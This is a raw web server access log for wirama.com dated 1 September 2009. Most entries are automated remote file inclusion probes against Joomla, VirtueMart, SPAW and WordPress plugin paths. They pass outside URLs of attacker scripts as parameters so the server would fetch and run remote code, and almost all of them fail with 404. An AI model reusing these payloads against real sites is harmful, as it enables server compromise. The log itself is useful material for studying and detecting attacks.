222.236.47.188 - - [01/Sep/2009:09:21:30 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:21:30 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:21:30 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:21:31 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:21:31 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.188 - - [01/Sep/2009:09:21:31 -0700] "GET /logs/access_090801.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.98.64.89 - - [01/Sep/2009:09:25:10 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.98.64.89 - - [01/Sep/2009:09:25:10 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.98.64.89 - - [01/Sep/2009:09:25:10 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.11.145.8 - - [01/Sep/2009:09:25:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:09:25:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.122.72.216 - - [01/Sep/2009:09:27:05 -0700] "GET /logs/access_090501.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:09:27:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
222.122.72.216 - - [01/Sep/2009:09:27:06 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bwbministries.com/images/r8_c11.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
218.38.34.182 - - [01/Sep/2009:09:28:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.38.34.182 - - [01/Sep/2009:09:28:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
69.36.9.113 - - [01/Sep/2009:09:33:24 -0700] "GET /logs/access_090601.log/scanhttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.36.9.113 - - [01/Sep/2009:09:33:24 -0700] "GET /scanhttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.36.9.113 - - [01/Sep/2009:09:33:24 -0700] "GET /logs/scanhttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
69.36.9.113 - - [01/Sep/2009:09:33:24 -0700] "GET /logs/access_090801.log/scanhttp://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:09:36:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:09:36:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.106.181 - - [01/Sep/2009:09:38:33 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
206.251.74.140 - - [01/Sep/2009:09:38:47 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.bidsnorth.com//includes/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
206.251.74.140 - - [01/Sep/2009:09:38:48 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.bidsnorth.com//includes/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
206.251.74.140 - - [01/Sep/2009:09:38:48 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.bidsnorth.com//includes/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:09:39:15 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:09:39:15 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:09:39:15 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
218.38.34.182 - - [01/Sep/2009:09:43:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.38.34.182 - - [01/Sep/2009:09:43:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.38.34.182 - - [01/Sep/2009:09:53:47 -0700] "GET //administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.38.34.182 - - [01/Sep/2009:09:53:47 -0700] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://bookbinding.kr/bbs/include/get_reply_files/rfiid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
210.114.225.248 - - [01/Sep/2009:10:04:12 -0700] "GET /logs////admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.114.225.248 - - [01/Sep/2009:10:04:13 -0700] "GET ///admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.114.225.248 - - [01/Sep/2009:10:04:13 -0700] "GET /logs/access_090401.log////admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.114.225.248 - - [01/Sep/2009:10:05:03 -0700] "GET /logs/access_090701.log////admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.244.99.7 - - [01/Sep/2009:10:08:14 -0700] "GET /logs/ HTTP/1.1" 200 2851 "http://foro.colombiaunderground.org/index.php?topic=5158.msg31224;topicseen" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00" "www.wirama.com"
201.244.99.7 - - [01/Sep/2009:10:08:18 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.wirama.com/logs/" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00" "www.wirama.com"
201.244.99.7 - - [01/Sep/2009:10:08:21 -0700] "GET /logs/access_081231.log HTTP/1.1" 200 303093 "http://www.wirama.com/logs/" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00" "www.wirama.com"
210.114.225.248 - - [01/Sep/2009:10:08:30 -0700] "GET /logs/access_090401.log%20%20////admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.114.225.248 - - [01/Sep/2009:10:09:24 -0700] "GET /logs/access_090701.log%20%20////admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:21 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:21 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /logs/access_090801.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /logs/access_090801.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:18:22 -0700] "GET /logs/access_090801.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
124.1.246.2 - - [01/Sep/2009:10:18:59 -0700] "GET /components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
124.1.246.2 - - [01/Sep/2009:10:18:59 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
208.80.195.33 - - [01/Sep/2009:10:19:17 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; (R1 1.5))" "wirama.com"
124.1.246.2 - - [01/Sep/2009:10:19:50 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
124.1.246.2 - - [01/Sep/2009:10:19:50 -0700] "GET /components/com_virtuemart/errors.php?error=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:04 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:04 -0700] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:04 -0700] "GET /components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:16 -0700] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:28 -0700] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:10:30:59 -0700] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
82.194.85.198 - - [01/Sep/2009:10:36:41 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
65.55.207.133 - - [01/Sep/2009:10:47:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
174.133.161.130 - - [01/Sep/2009:10:47:58 -0700] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://jrigutto.com/osc/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
110.45.146.223 - - [01/Sep/2009:10:49:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
110.45.146.223 - - [01/Sep/2009:10:50:01 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
110.45.146.223 - - [01/Sep/2009:10:50:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
110.45.146.223 - - [01/Sep/2009:10:50:02 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
65.55.207.133 - - [01/Sep/2009:10:51:32 -0700] "GET /logs/ HTTP/1.0" 200 2835 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
199.96.29.70 - - [01/Sep/2009:10:52:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "wirama.com"
199.96.29.70 - - [01/Sep/2009:10:52:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "wirama.com"
72.3.247.173 - - [01/Sep/2009:10:55:36 -0700] "GET /logs//spaw/dialogs/img_library.php?spaw_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.3.247.173 - - [01/Sep/2009:10:55:36 -0700] "GET /spaw/dialogs/img_library.php?spaw_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
195.210.57.83 - - [01/Sep/2009:10:57:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.wirama.com"
195.210.57.83 - - [01/Sep/2009:10:57:30 -0700] "GET /contents.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.wirama.com"
110.45.146.223 - - [01/Sep/2009:10:59:08 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
110.45.146.223 - - [01/Sep/2009:10:59:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
72.11.145.8 - - [01/Sep/2009:11:05:21 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [01/Sep/2009:11:05:21 -0700] "GET //appserv/main.php?appserv_root=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
110.45.146.223 - - [01/Sep/2009:11:09:18 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:11:10:54 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.18.168.84 - - [01/Sep/2009:11:10:55 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/cyber.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
207.250.188.51 - - [01/Sep/2009:11:11:15 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
207.250.188.51 - - [01/Sep/2009:11:11:15 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:11:35 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:11:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:11:47 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:11:47 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
222.236.47.182 - - [01/Sep/2009:11:14:04 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:11:14:04 -0700] "GET /logs/access_090801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:11:14:07 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.38.136.251 - - [01/Sep/2009:11:14:12 -0700] "GET /logs/access_090801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.38.136.251 - - [01/Sep/2009:11:14:13 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.38.136.251 - - [01/Sep/2009:11:14:13 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:33 -0700] "GET /error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:33 -0700] "GET /logs/access_090531.log/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:33 -0700] "GET /error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:33 -0700] "GET /logs/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:38 -0700] "GET /error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:38 -0700] "GET /logs/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:38 -0700] "GET /logs/access_090531.log/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:39 -0700] "GET /logs/access_090531.log/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:39 -0700] "GET /error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:39 -0700] "GET /logs/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:42 -0700] "GET /logs/access_090531.log/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
211.189.18.73 - - [01/Sep/2009:11:14:42 -0700] "GET /logs/error.php?dir=http://www.winewise.de//administrator/modules/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.94.109.230 - - [01/Sep/2009:11:14:44 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
69.94.109.230 - - [01/Sep/2009:11:14:44 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://cr0s.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
207.250.188.51 - - [01/Sep/2009:11:14:48 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.250.188.51 - - [01/Sep/2009:11:14:48 -0700] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.250.188.51 - - [01/Sep/2009:11:14:48 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:14:51 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:14:51 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.99.254.254 - - [01/Sep/2009:11:14:51 -0700] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.82movie.com/jembot1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.11.145.8 - - [01/Sep/2009:11:15:26 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:11:15:26 -0700] "GET /logs/access_090531.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
72.11.145.8 - - [01/Sep/2009:11:15:26 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trac-juegos.com.ar/fzadmin/bobs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
